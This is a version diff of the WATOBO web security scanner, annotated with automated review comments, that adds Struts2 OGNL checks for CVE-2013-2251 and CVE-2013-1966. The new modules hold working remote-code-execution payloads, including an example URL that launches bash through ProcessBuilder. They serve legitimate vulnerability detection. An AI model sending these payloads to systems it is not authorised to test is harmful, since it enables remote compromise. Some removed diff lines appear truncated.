watobo 0.9.14 → 0.9.15
- data/CHANGELOG.md +29 -0
- data/config/interceptor.yml +1 -0
- data/lib/watobo/core/active_check.rb +1 -2
- data/lib/watobo/core/client_cert_store.rb +47 -0
- data/lib/watobo/core/scanner3.rb +124 -88
- data/lib/watobo/core/session.rb +52 -47
- data/lib/watobo/core.rb +1 -11
- data/lib/watobo/gui/chatviewer_frame.rb +5 -3
- data/lib/watobo/gui/checkboxtree.rb +59 -14
- data/lib/watobo/gui/checks_policy_frame.rb +1 -5
- data/lib/watobo/gui/client_cert_dialog.rb +260 -96
- data/lib/watobo/gui/conversation_table.rb +7 -1
- data/lib/watobo/gui/conversation_table_ctrl2.rb +14 -5
- data/lib/watobo/gui/edit_comment.rb +1 -1
- data/lib/watobo/gui/main_window.rb +40 -5
- data/lib/watobo/gui/manual_request_editor.rb +10 -8
- data/lib/watobo/gui/quick_scan_dialog.rb +8 -6
- data/lib/watobo/gui/scanner_settings_dialog.rb +1 -0
- data/lib/watobo/gui/text_viewer.rb +5 -3
- data/lib/watobo/http/cookies/cookies.rb +3 -1
- data/lib/watobo/http_socket/agent.rb +1 -1
- data/lib/watobo/http_socket/client_socket.rb +409 -98
- data/lib/watobo/http_socket/connection.rb +1 -1
- data/lib/watobo/http_socket/http_socket.rb +47 -39
- data/lib/watobo/interceptor/proxy.rb +41 -212
- data/lib/watobo/mixins/httpparser.rb +17 -16
- data/lib/watobo/mixins/shapers.rb +3 -7
- data/lib/watobo.rb +2 -1
- data/modules/active/domino/domino_db.rb +5 -7
- data/modules/active/struts2/default_handler_ognl.rb +128 -0
- data/modules/active/struts2/include_params_ognl.rb +127 -0
- data/modules/passive/ajax.rb +5 -3
- data/modules/passive/detect_infrastructure.rb +2 -3
- data/modules/passive/dirindexing.rb +8 -6
- data/modules/passive/disclosure_emails.rb +13 -14
- data/modules/passive/disclosure_ipaddr.rb +13 -13
- data/modules/passive/hotspots.rb +6 -4
- data/modules/passive/in_script_parameter.rb +25 -19
- data/modules/passive/redirectionz.rb +1 -1
- data/modules/passive/sap-headers.rb +78 -0
- data/modules/passive/xss_dom.rb +5 -3
- data/plugins/catalog/catalog.rb +7 -2
- data/plugins/crawler/gui/auth_frame.rb +20 -5
- data/plugins/crawler/gui/crawler_gui.rb +56 -9
- data/plugins/crawler/lib/engine.rb +12 -14
- data/plugins/filefinder/dbs/sap.db +157 -0
- metadata +23 -2
@@ -27,13 +27,11 @@ module Watobo#:nodoc: all
|
|
27
27
|
include Watobo::Constants
|
28
28
|
def replace_post_parm(parm,value)
|
29
29
|
parm_quoted = Regexp.quote(parm)
|
30
|
-
self.last.gsub!(/([?&]{0,1})#{parm_quoted}=([
|
30
|
+
self.last.gsub!(/([?&]{0,1})#{parm_quoted}=([^&]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
|
31
31
|
end
|
32
32
|
|
33
33
|
def replace_get_parm(parm,value)
|
34
34
|
parm_quoted = Regexp.quote(parm)
|
35
|
-
# puts "replacing parameter #{parm} with value #{value}"
|
36
|
-
# self.first.gsub!(/([?&]{0,1})#{parm}=([0-9a-zA-Z\-\._,+<>\%!=]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
|
37
35
|
self.first.gsub!(/([?&]{1})#{parm_quoted}=([^ &]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
|
38
36
|
end
|
39
37
|
|
@@ -42,7 +40,6 @@ module Watobo#:nodoc: all
|
|
42
40
|
end
|
43
41
|
|
44
42
|
def replaceFileExt(new_file)
|
45
|
-
# puts "replace element #{new_element}"
|
46
43
|
begin
|
47
44
|
file = new_file.strip
|
48
45
|
file.gsub!(/^\//, "")
|
@@ -53,9 +50,8 @@ module Watobo#:nodoc: all
|
|
53
50
|
end
|
54
51
|
|
55
52
|
def replaceElement(new_element)
|
56
|
-
# puts "replace element #{new_element}"
|
57
53
|
new_element.gsub!(/^\//, "")
|
58
|
-
self.first.gsub!(/(
|
54
|
+
self.first.gsub!(/([^\?]*\/)(.*) (HTTP.*)/i,"\\1#{new_element} \\3")
|
59
55
|
end
|
60
56
|
|
61
57
|
def replaceURL(new_url)
|
@@ -370,7 +366,7 @@ module Watobo#:nodoc: all
|
|
370
366
|
begin
|
371
367
|
new_header = "#{header}: #{value}\r\n"
|
372
368
|
self.each_with_index do |h, i|
|
373
|
-
if h =~ /^#{Regexp.quote(header)}:/
|
369
|
+
if h =~ /^#{Regexp.quote(header)}:/i
|
374
370
|
h.replace(new_header)
|
375
371
|
return true
|
376
372
|
end
|
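Review bot: The rewritten replace_post_parm line passes `"\\1#{parm}=#{value}\\3"` as a gsub! replacement string, so a `value` (or `parm`) containing `\1`, `\0` or `\&` is expanded as a back-reference instead of being written literally — a real concern for a tool whose values are attack payloads; the unchanged replace_get_parm line and the rewritten replaceElement line have the same shape. Use the block form so the values are inserted verbatim: `self.last.gsub!(/([?&]{0,1})#{parm_quoted}=([^&]*)(&{0,1})/i) { "#{$1}#{parm}=#{value}#{$3}" }`. Separately, the optional `[?&]{0,1}` prefix lets the post pattern match the tail of a longer name (`id=` inside `userid=`) while replace_get_parm requires the delimiter; if `self.last` is the body string, `(\A|&)` would anchor it without losing the first parameter. The methods themselves are complete in the hunks, but the enclosing module runs outside them.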
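--- a/data/lib/watobo.rb
+++ b/data/lib/watobo.rb
@@ -23,6 +23,7 @@
 #Encoding: UTF-8
 require 'rubygems'
 require 'yaml'
+require 'json'
 require 'thread'
 require 'socket'
 require 'timeout'
@@ -63,7 +64,7 @@ dont_know_why_REQUIRE_hangs = Mechanize.new
 # @private
 module Watobo#:nodoc: all #:nodoc: all
 
-VERSION = "0.9.
+VERSION = "0.9.15"
 
 def self.base_directory
 @base_directory ||= ""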
@@ -35,7 +35,7 @@ module Watobo#:nodoc: all
|
|
35
35
|
:description => "Enumeration of well known Domino DBs.", # description of checkfunction
|
36
36
|
:author => "Andreas Schmidt", # author of check
|
37
37
|
:check_group => AC_GROUP_DOMINO,
|
38
|
-
:version => "0
|
38
|
+
:version => "1.0" # check version
|
39
39
|
)
|
40
40
|
|
41
41
|
@finding.update(
|
@@ -69,16 +69,14 @@ module Watobo#:nodoc: all
|
|
69
69
|
|
70
70
|
def generateChecks(chat)
|
71
71
|
begin
|
72
|
-
|
72
|
+
# if chat.request.url.to_s =~ /(.*)\/\w*\.nsf/ then
|
73
73
|
@domino_dbs.each do |db|
|
74
74
|
checker = proc{
|
75
75
|
test_request = nil
|
76
76
|
test_response = nil
|
77
77
|
test = chat.copyRequest
|
78
|
-
|
79
|
-
|
80
|
-
# puts line
|
81
|
-
test.unshift line
|
78
|
+
|
79
|
+
test.replaceFileExt db
|
82
80
|
|
83
81
|
test_request,test_response = doRequest(test,:default => true)
|
84
82
|
|
@@ -110,7 +108,7 @@ module Watobo#:nodoc: all
|
|
110
108
|
}
|
111
109
|
yield checker
|
112
110
|
end
|
113
|
-
end
|
111
|
+
#end
|
114
112
|
rescue => bang
|
115
113
|
puts bang
|
116
114
|
puts "ERROR!! #{Module.nesting[0].name}"
|
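Review bot: Commenting out the `.nsf` gate in generateChecks (and its matching `#end`) means every in-scope chat now yields one probe per entry in `@domino_dbs`, with no memory of which directories have already been tested, so a site with many pages produces the same database enumeration over and over. The Struts check added in this release keeps a per-directory table for exactly this purpose; a similar `return true if @@tested_directories.has_key?(chat.request.dir)` guard (with the table filled afterwards) before the loop would bound the request volume. If the gate is meant to be gone for good, delete the two commented lines rather than leaving the dangling `#end`. The begin/rescue of generateChecks ends outside the hunk.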
@@ -0,0 +1,128 @@
|
|
1
|
+
# .
|
2
|
+
# default_handler_ognl.rb
|
3
|
+
#
|
4
|
+
# Copyright 2013 by siberas, http://www.siberas.de
|
5
|
+
#
|
6
|
+
# This file is part of WATOBO (Web Application Tool Box)
|
7
|
+
# http://watobo.sourceforge.com
|
8
|
+
#
|
9
|
+
# WATOBO is free software; you can redistribute it and/or modify
|
10
|
+
# it under the terms of the GNU General Public License as published by
|
11
|
+
# the Free Software Foundation version 2 of the License.
|
12
|
+
#
|
13
|
+
# WATOBO is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with WATOBO; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
# .
|
22
|
+
# @private
|
23
|
+
module Watobo#:nodoc: all
|
24
|
+
module Modules
|
25
|
+
module Active
|
26
|
+
module Struts2
|
27
|
+
|
28
|
+
|
29
|
+
class Default_handler_ognl < Watobo::ActiveCheck
|
30
|
+
@@tested_directories = Hash.new
|
31
|
+
|
32
|
+
threat =<<'EOF'
|
33
|
+
A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution
|
34
|
+
|
35
|
+
Source: http://struts.apache.org/release/2.3.x/docs/s2-016.html
|
36
|
+
CVE: CVE-2013-2251
|
37
|
+
EOF
|
38
|
+
|
39
|
+
#
|
40
|
+
details =<<'EOD'
|
41
|
+
Example for code execution:
|
42
|
+
http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
|
43
|
+
EOD
|
44
|
+
|
45
|
+
|
46
|
+
measure = "Update Struts2 to version >2.3.15.1"
|
47
|
+
|
48
|
+
@info.update(
|
49
|
+
:check_name => 'Struts2 default handlers', # name of check which briefly describes functionality, will be used for tree and progress views
|
50
|
+
:check_group => "Struts",
|
51
|
+
:description => "Check for struts2 default handlers which doesn't sanitize parameters.", # description of checkfunction
|
52
|
+
:author => "Andreas Schmidt", # author of check
|
53
|
+
:version => "1.0" # check version
|
54
|
+
)
|
55
|
+
|
56
|
+
@finding.update(
|
57
|
+
:threat => threat, # thread of vulnerability, e.g. loss of information
|
58
|
+
:class => "Struts2 - default handlers", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
|
59
|
+
:type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
|
60
|
+
:rating => VULN_RATING_CRITICAL,
|
61
|
+
:measure => measure,
|
62
|
+
:details => details
|
63
|
+
)
|
64
|
+
|
65
|
+
def initialize(project, prefs={})
|
66
|
+
super(project, prefs)
|
67
|
+
|
68
|
+
@vuln_handlers = %w( action redirect redirectAction)
|
69
|
+
|
70
|
+
def reset
|
71
|
+
@@tested_directories.clear
|
72
|
+
end
|
73
|
+
|
74
|
+
|
75
|
+
end
|
76
|
+
|
77
|
+
|
78
|
+
def generateChecks(chat)
|
79
|
+
begin
|
80
|
+
#
|
81
|
+
path = chat.request.dir
|
82
|
+
return true if @@tested_directories.has_key?(path)
|
83
|
+
|
84
|
+
@@tested_directories[path] = true
|
85
|
+
@vuln_handlers.each do |handler|
|
86
|
+
checker = proc {
|
87
|
+
results = {}
|
88
|
+
request = nil
|
89
|
+
response = nil
|
90
|
+
test_request = chat.copyRequest
|
91
|
+
|
92
|
+
test_value = '?' + CGI::escape("#{handler}:watobo_%{10000-1}")
|
93
|
+
|
94
|
+
test_request.replaceElement test_value
|
95
|
+
|
96
|
+
request, response = doRequest(test_request)
|
97
|
+
|
98
|
+
if response.headers.select{|h| h =~ /^Location:.*(_9999)/}.length > 0
|
99
|
+
|
100
|
+
addFinding( request, response,
|
101
|
+
:check_pattern => test_value,
|
102
|
+
:proof_pattern => "Location:.*_9999",
|
103
|
+
:test_item => handler,
|
104
|
+
:chat => chat,
|
105
|
+
:title => "[#{request.dir}] - #{handler}"
|
106
|
+
)
|
107
|
+
end
|
108
|
+
|
109
|
+
[ request, response ]
|
110
|
+
}
|
111
|
+
yield checker
|
112
|
+
|
113
|
+
end
|
114
|
+
|
115
|
+
rescue => bang
|
116
|
+
puts bang
|
117
|
+
puts bang.backtrace if $DEBUG
|
118
|
+
puts "ERROR!! #{Module.nesting[0].name}"
|
119
|
+
raise
|
120
|
+
end
|
121
|
+
end
|
122
|
+
|
123
|
+
end
|
124
|
+
|
125
|
+
end
|
126
|
+
end
|
127
|
+
end
|
128
|
+
end
|
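Review bot: The proof match `response.headers.select{|h| h =~ /^Location:.*(_9999)/}` is case-sensitive on the header name, although this same release makes the header lookup in the shapers mixin case-insensitive (`/^#{Regexp.quote(header)}:/i`); a server emitting `location:` would make the check miss an evaluated payload. It also dereferences `response` without a nil guard, unlike include_params_ognl.rb which tests `respond_to?` first, so a dropped connection ends in the rescue/raise path instead of a clean miss; suggest `if response.respond_to?(:headers) && response.headers.any? { |h| h =~ /^Location:.*_9999/i }`. Note that `reset` is defined inside `initialize` (a nested `def`), so it only comes into existence when an instance is built; moving it to class level reads as intended. Finally, the `action:` prefix does not normally answer with a redirect, so a Location-based proof presumably never fires for that handler — worth confirming or dropping it from `@vuln_handlers`.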
@@ -0,0 +1,127 @@
|
|
1
|
+
# .
|
2
|
+
# include_params_ognl.rb
|
3
|
+
#
|
4
|
+
# Copyright 2013 by siberas, http://www.siberas.de
|
5
|
+
#
|
6
|
+
# This file is part of WATOBO (Web Application Tool Box)
|
7
|
+
# http://watobo.sourceforge.com
|
8
|
+
#
|
9
|
+
# WATOBO is free software; you can redistribute it and/or modify
|
10
|
+
# it under the terms of the GNU General Public License as published by
|
11
|
+
# the Free Software Foundation version 2 of the License.
|
12
|
+
#
|
13
|
+
# WATOBO is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with WATOBO; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
# .
|
22
|
+
# @private
|
23
|
+
module Watobo#:nodoc: all
|
24
|
+
module Modules
|
25
|
+
module Active
|
26
|
+
module Struts2
|
27
|
+
|
28
|
+
|
29
|
+
class Include_params_ognl < Watobo::ActiveCheck
|
30
|
+
|
31
|
+
threat =<<'EOF'
|
32
|
+
A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution
|
33
|
+
|
34
|
+
Source: http://struts.apache.org/release/2.3.x/docs/s2-013.html
|
35
|
+
CVE: CVE-2013-1966
|
36
|
+
EOF
|
37
|
+
|
38
|
+
#
|
39
|
+
details =<<'EOD'
|
40
|
+
Example for code execution:
|
41
|
+
http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
|
42
|
+
EOD
|
43
|
+
|
44
|
+
|
45
|
+
measure = "Update Struts2 to version >2.3.14"
|
46
|
+
|
47
|
+
@info.update(
|
48
|
+
:check_name => 'Struts2 includeParams', # name of check which briefly describes functionality, will be used for tree and progress views
|
49
|
+
:check_group => "Struts",
|
50
|
+
:description => "Check for vulnerable includeParams attribute.", # description of checkfunction
|
51
|
+
:author => "Andreas Schmidt", # author of check
|
52
|
+
:version => "1.0" # check version
|
53
|
+
)
|
54
|
+
|
55
|
+
@finding.update(
|
56
|
+
:threat => threat, # thread of vulnerability, e.g. loss of information
|
57
|
+
:class => "Struts2 - includeParams", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
|
58
|
+
:type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
|
59
|
+
:rating => VULN_RATING_CRITICAL,
|
60
|
+
:measure => measure,
|
61
|
+
:details => details
|
62
|
+
)
|
63
|
+
|
64
|
+
def initialize(project, prefs={})
|
65
|
+
super(project, prefs)
|
66
|
+
|
67
|
+
end
|
68
|
+
|
69
|
+
|
70
|
+
def generateChecks(chat)
|
71
|
+
begin
|
72
|
+
|
73
|
+
checker = proc {
|
74
|
+
results = {}
|
75
|
+
request = nil
|
76
|
+
response = nil
|
77
|
+
test_request = chat.copyRequest
|
78
|
+
|
79
|
+
|
80
|
+
test_value = "%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println(INJ),#writer.close())}"
|
81
|
+
marks = [ "INJ" , Time.now.to_i.to_s ]
|
82
|
+
|
83
|
+
inj_str = marks.map{|m| "'#{m}'"}.join("+")
|
84
|
+
|
85
|
+
test_value.gsub!(/INJ/, inj_str)
|
86
|
+
|
87
|
+
tparam = Watobo::UrlParameter.new( :name => "watobo", :value => CGI::escape(test_value) )
|
88
|
+
|
89
|
+
test_request.url.set tparam
|
90
|
+
puts test_request.first
|
91
|
+
|
92
|
+
request, response = doRequest(test_request)
|
93
|
+
|
94
|
+
if response.respond_to? :body
|
95
|
+
unless response.body.nil?
|
96
|
+
body = response.body.unpack("C*").pack("C*")
|
97
|
+
#puts body
|
98
|
+
proof = marks.join
|
99
|
+
if response.body.to_s =~ /#{proof}/
|
100
|
+
addFinding( request, response,
|
101
|
+
:check_pattern => CGI::escape(test_value),
|
102
|
+
:proof_pattern => "#{proof}",
|
103
|
+
:chat => chat,
|
104
|
+
:title => "[includeParams] - #{request.file}"
|
105
|
+
)
|
106
|
+
end
|
107
|
+
end
|
108
|
+
end
|
109
|
+
|
110
|
+
[ request, response ]
|
111
|
+
}
|
112
|
+
yield checker
|
113
|
+
|
114
|
+
rescue => bang
|
115
|
+
puts bang
|
116
|
+
puts bang.backtrace if $DEBUG
|
117
|
+
puts "ERROR!! #{Module.nesting[0].name}"
|
118
|
+
raise
|
119
|
+
end
|
120
|
+
end
|
121
|
+
|
122
|
+
end
|
123
|
+
|
124
|
+
end
|
125
|
+
end
|
126
|
+
end
|
127
|
+
end
|
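Review bot: The binary-safe copy `body = response.body.unpack("C*").pack("C*")` is computed and then ignored — the proof is matched against `response.body.to_s`, which for a body tagged as UTF-8 but containing invalid bytes can raise an invalid-byte-sequence error from `=~` and abort the check via the rescue/raise path (the repack presumably exists to avoid exactly that, as the passive checks in this release use it). Match the copy instead: `if body =~ /#{proof}/`. The `puts test_request.first` after `test_request.url.set tparam` is leftover debug output that prints every generated request line to the console; drop it or gate it on `$DEBUG` like the backtrace below. `results = {}` is also assigned and never used.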
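--- a/data/modules/passive/ajax.rb
+++ b/data/modules/passive/ajax.rb
@@ -51,18 +51,20 @@ module Watobo#:nodoc: all
 end
 
 def showError(chatid, message)
-puts "!!! Error"
+puts "!!! Error #{Module.nesting[0].name}"
 puts "Chat: [#{chatid}]"
 puts message
 end
 
 def do_test(chat)
 begin
-
+return false if chat.response.nil?
+return false unless chat.response.has_body?
 return true unless chat.response.content_type =~ /(text|script)/
 
 @fw_patterns.each do |pattern|
-
+body = chat.response.body.unpack("C*").pack("C*")
+if body =~ /#{pattern[:pattern]}/i then
 version = $1.strip
 addFinding(
 :check_pattern => "#{pattern[:pattern]}",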
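Review bot: `body = chat.response.body.unpack("C*").pack("C*")` now sits inside `@fw_patterns.each`, so the whole body is copied once per pattern although it does not depend on `pattern`; hoist it above the loop as the other passive checks in this release do. `version = $1.strip` on the following line still assumes every `pattern[:pattern]` contains a capture group; a pattern without one leaves `$1` nil and raises NoMethodError, presumably caught by a rescue further down, outside the hunk. do_test also returns `false` from the two new guards but `true` from the content-type guard; if callers use the return value, pick one.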
@@ -70,10 +70,9 @@ module Watobo#:nodoc: all
|
|
70
70
|
# puts "body" + chat.response.body.join
|
71
71
|
return if chat.response.nil? or chat.response.body.nil?
|
72
72
|
if chat.response.content_type =~ /text/ then
|
73
|
-
|
73
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
74
74
|
@pattern_list.each do |pat|
|
75
|
-
|
76
|
-
if chat.response.join =~ /(#{pat[1]})/i then
|
75
|
+
if body =~ /(#{pat[1]})/i then
|
77
76
|
# puts "!!! MATCH !!!"
|
78
77
|
match = $1
|
79
78
|
addFinding(
|
@@ -61,12 +61,14 @@ module Watobo#:nodoc: all
|
|
61
61
|
def do_test(chat)
|
62
62
|
begin
|
63
63
|
@pattern_list.each do |pat|
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
|
64
|
+
next unless chat.response.has_body?
|
65
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
66
|
+
if body =~ /(#{pat})/i then
|
67
|
+
match = $1
|
68
|
+
addFinding(
|
69
|
+
:proof_pattern => "#{match}",
|
70
|
+
:chat => chat,
|
71
|
+
:title => "/#{chat.request.path}"
|
70
72
|
)
|
71
73
|
end
|
72
74
|
end
|
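Review bot: The `next unless chat.response.has_body?` guard and the `body = ...` repack sit inside `@pattern_list.each`, so they are re-evaluated for every pattern although neither depends on `pat`; the sibling checks in this release place them once before the loop. There is also no `chat.response.nil?` guard, so a chat without a response raises NoMethodError on `has_body?`. Suggest `return false if chat.response.nil? || !chat.response.has_body?` and `body = chat.response.body.unpack("C*").pack("C*")` ahead of `@pattern_list.each do |pat|`. The rest of do_test, including its rescue, is outside the hunk.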
@@ -45,29 +45,28 @@ module Watobo#:nodoc: all
|
|
45
45
|
)
|
46
46
|
|
47
47
|
valid = '[a-zA-Z\d\.+-]+'
|
48
|
-
@pattern = "#{valid}@#{valid}\\.(#{valid}){2}"
|
48
|
+
@pattern = "(#{valid}@#{valid}\\.(#{valid}){2})"
|
49
49
|
@mail_list = []
|
50
50
|
end
|
51
51
|
|
52
52
|
def do_test(chat)
|
53
53
|
begin
|
54
54
|
# puts "running module: #{Module.nesting[0].name}"
|
55
|
+
return false if chat.response.nil?
|
56
|
+
return false unless chat.response.has_body?
|
55
57
|
if chat.response.content_type =~ /text/ and not chat.response.content_type =~ /text.csv/ then
|
56
|
-
|
57
|
-
|
58
|
-
match =
|
59
|
-
|
58
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
59
|
+
body.scan(/#{@pattern}/) { |m|
|
60
|
+
match = m.first
|
61
|
+
unless @mail_list.include?(match) then
|
60
62
|
@mail_list.push match
|
61
63
|
addFinding(
|
62
|
-
|
63
|
-
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
end
|
70
|
-
end
|
64
|
+
:proof_pattern => "#{match}",
|
65
|
+
:chat => chat,
|
66
|
+
:title => match
|
67
|
+
)
|
68
|
+
end
|
69
|
+
}
|
71
70
|
end
|
72
71
|
rescue => bang
|
73
72
|
# raise
|
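Review bot: The new capture group wraps a top-level-domain part `(#{valid}){2}` whose character class still admits `.`, `+` and `-`, so strings such as `lib@2.0.1-beta` or `a@b.c-` are reported as e-mail addresses; tightening the suffix to `[a-zA-Z]{2,}` after the `\\.` keeps the intent and removes those false positives, assuming numeric or punycode domains are not wanted here. `/#{@pattern}/` is also recompiled on every call to do_test; storing `@pattern` as a Regexp in the constructor and passing it to `scan` avoids that. The rescue that closes do_test lies outside the hunk.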
@@ -45,22 +45,25 @@ module Watobo#:nodoc: all
|
|
45
45
|
)
|
46
46
|
|
47
47
|
@pattern = '[^\d\.](\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[^(\d\.)]+?'
|
48
|
+
|
48
49
|
@known_ips = []
|
49
50
|
end
|
50
51
|
|
51
52
|
def do_test(chat)
|
52
53
|
begin
|
53
54
|
# puts "running module: #{Module.nesting[0].name}"
|
55
|
+
return false if chat.response.nil?
|
56
|
+
return false unless chat.response.has_body?
|
54
57
|
if chat.response.content_type =~ /text/ then
|
55
|
-
|
56
|
-
|
57
|
-
|
58
|
-
|
59
|
-
|
60
|
-
|
58
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
59
|
+
body.scan(/#{@pattern}/) { |match|
|
60
|
+
ip_addr = match.first
|
61
|
+
octets = ip_addr.split('.')
|
62
|
+
isIP = true
|
63
|
+
octets.each do |o|
|
61
64
|
isIP = false if o.to_i > 255
|
62
|
-
|
63
|
-
|
65
|
+
end
|
66
|
+
if isIP then
|
64
67
|
title = "IP: #{ip_addr}"
|
65
68
|
dummy = chat.request.site + ":" + ip_addr
|
66
69
|
if not @known_ips.include?(dummy)
|
@@ -69,11 +72,8 @@ module Watobo#:nodoc: all
|
|
69
72
|
:title => title)
|
70
73
|
@known_ips.push dummy
|
71
74
|
end
|
72
|
-
|
73
|
-
|
74
|
-
|
75
|
-
end
|
76
|
-
end
|
75
|
+
end
|
76
|
+
}
|
77
77
|
end
|
78
78
|
rescue => bang
|
79
79
|
# raise
|
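Review bot: The octet validation `isIP = true` / `octets.each do |o| isIP = false if o.to_i > 255 end` can be written as `isIP = octets.all? { |o| o.to_i <= 255 }`, which reads as the predicate it is. The unchanged pattern `[^\d\.](\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[^(\d\.)]+?` requires a character before the address, so an address at the very start of the body is never found, and the trailing `[^(\d\.)]+?` consumes the character after it, which would swallow the delimiter of a directly adjacent match — worth confirming against the intended inputs. do_test's rescue is outside the hunk.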
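--- a/data/modules/passive/hotspots.rb
+++ b/data/modules/passive/hotspots.rb
@@ -54,9 +54,12 @@ module Watobo#:nodoc: all
 def do_test(chat)
 begin
 # puts "running module: #{Module.nesting[0].name}"
+return false if chat.response.nil?
+return false unless chat.response.has_body?
 if chat.response.content_type =~ /(text|script)/ and chat.response.status !~ /404/ then
-
-
+
+body = chat.response.body.unpack("C*").pack("C*")
+body.split(/\n/).each do |line|
 @pattern_list.each do |ext|
 if line =~ /([\w%\/\\\.:-]*\.#{ext})[^\w]/ then
 match = $1
@@ -71,8 +74,6 @@ module Watobo#:nodoc: all
 @known_functions.push match
 end
 end
-end
-end
 end
 end
 end
@@ -80,6 +81,7 @@ module Watobo#:nodoc: all
 # raise
 puts "ERROR!! #{Module.nesting[0].name}"
 puts bang
+puts bang.backtrace
 end
 end
 end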
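Review bot: The added `puts bang.backtrace` in the rescue prints a full trace for every failing chat unconditionally, while the new Struts checks in this release gate it with `puts bang.backtrace if $DEBUG`; use the same guard so normal scans stay quiet. The context line `chat.response.status !~ /404/` matches the status text anywhere, so a reason phrase containing 404 would also be skipped; if `status` holds only the numeric code as a string, `chat.response.status != "404"` is the clearer comparison — worth confirming what `status` returns.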
@@ -48,42 +48,48 @@ module Watobo#:nodoc: all
|
|
48
48
|
end
|
49
49
|
|
50
50
|
def showError(chatid, message)
|
51
|
-
puts "!!! Error"
|
51
|
+
puts "!!! Error #{Module.nesting[0].name}"
|
52
52
|
puts "Chat: [#{chatid}]"
|
53
53
|
puts message
|
54
54
|
end
|
55
55
|
|
56
56
|
def do_test(chat)
|
57
57
|
begin
|
58
|
-
parm_values = []
|
59
58
|
minlen = 3
|
60
|
-
return true unless chat.response.content_type =~ /(text|script)/
|
61
|
-
chat.
|
62
|
-
|
63
|
-
|
64
|
-
|
65
|
-
chat.
|
66
|
-
pv = chat.request.post_parm_value(parm)
|
67
|
-
parm_values.push pv unless pv.strip.empty? or pv.strip.length < minlen
|
68
|
-
end
|
59
|
+
return true unless chat.response.content_type =~ /(text|script)/
|
60
|
+
return true unless chat.response.has_body?
|
61
|
+
|
62
|
+
parm_list = chat.request.parameters(:data, :url)
|
63
|
+
return true if parm_list.empty?
|
64
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
69
65
|
|
70
|
-
|
71
|
-
|
72
|
-
|
73
|
-
|
66
|
+
doc = Nokogiri::HTML(body)
|
67
|
+
scripts = doc.css('script')
|
68
|
+
|
69
|
+
parm_list.each do |parm|
|
70
|
+
next if parm.value.nil?
|
71
|
+
next if parm.value.empty?
|
72
|
+
next if parm.value.length <= minlen
|
73
|
+
|
74
|
+
pattern = Regexp.quote(CGI.unescape(parm.value))
|
75
|
+
scripts.each do |script|
|
76
|
+
if script.text =~ /#{pattern}/i then
|
74
77
|
# puts "* Found: Parameter within script"
|
75
78
|
addFinding(
|
76
|
-
:check_pattern => "#{
|
77
|
-
|
78
|
-
|
79
|
-
|
79
|
+
:check_pattern => "#{parm.value}",
|
80
|
+
:proof_pattern => "#{parm.value}",
|
81
|
+
:chat=>chat,
|
82
|
+
:title =>"[#{parm.value}] - #{chat.request.path}"
|
80
83
|
)
|
84
|
+
end
|
81
85
|
|
82
86
|
end
|
83
87
|
end
|
84
88
|
rescue => bang
|
85
89
|
# raise
|
86
90
|
showError(chat.id, bang)
|
91
|
+
#puts bang.backtrace
|
92
|
+
|
87
93
|
end
|
88
94
|
end
|
89
95
|
|
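Review bot: Matching only `doc.css('script')` silently drops detection for responses that are themselves JavaScript: the content-type guard still admits `script` types, but `Nokogiri::HTML` does not produce a `<script>` node for a bare JS body, so `scripts` is empty and a parameter reflected in an `application/javascript` response is no longer reported (the removed lines are truncated here, but their `chat.` calls suggest the old code matched the response directly). Fall back to the body when there is no script element, e.g. `targets = scripts.empty? ? [body] : scripts.map(&:text)` and `if targets.any? { |t| t =~ /#{pattern}/i }`. `chat.response` is also dereferenced on the first guard without the `nil?` check the sibling checks gained in this release, and the length guard changed from `< minlen` to `<= minlen`, so three-character values are now skipped — confirm that is intended. The class and its rescue continue outside the hunk.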